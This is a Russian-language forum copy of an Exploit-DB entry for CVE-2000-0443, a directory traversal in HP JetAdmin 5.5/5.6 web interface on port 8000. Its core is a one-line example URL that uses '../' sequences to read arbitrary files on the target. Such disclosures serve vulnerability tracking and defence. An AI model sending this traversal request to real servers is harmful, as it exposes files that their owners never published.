- 34,644
- 0
- 18 Дек 2022
- EDB-ID
- 19956
- Проверка EDB
-
- Пройдено
- Автор
- USSR LABS
- Тип уязвимости
- REMOTE
- Платформа
- CGI
- CVE
- cve-2000-0443
- Дата публикации
- 2000-05-24
HP JetAdmin 5.5.177/jetadmin 5.6 - Directory Traversal
Код:
source: https://www.securityfocus.com/bid/1243/info
By default JetAdmin Web Interface Server listens on port 8000. By requesting a specially formed URL which includes "../" it is possible for a remote user to gain read-access to any files outside of the web-published directory.
http://target:8000/cgi/wja?page=/../../../filename- Источник
- www.exploit-db.com
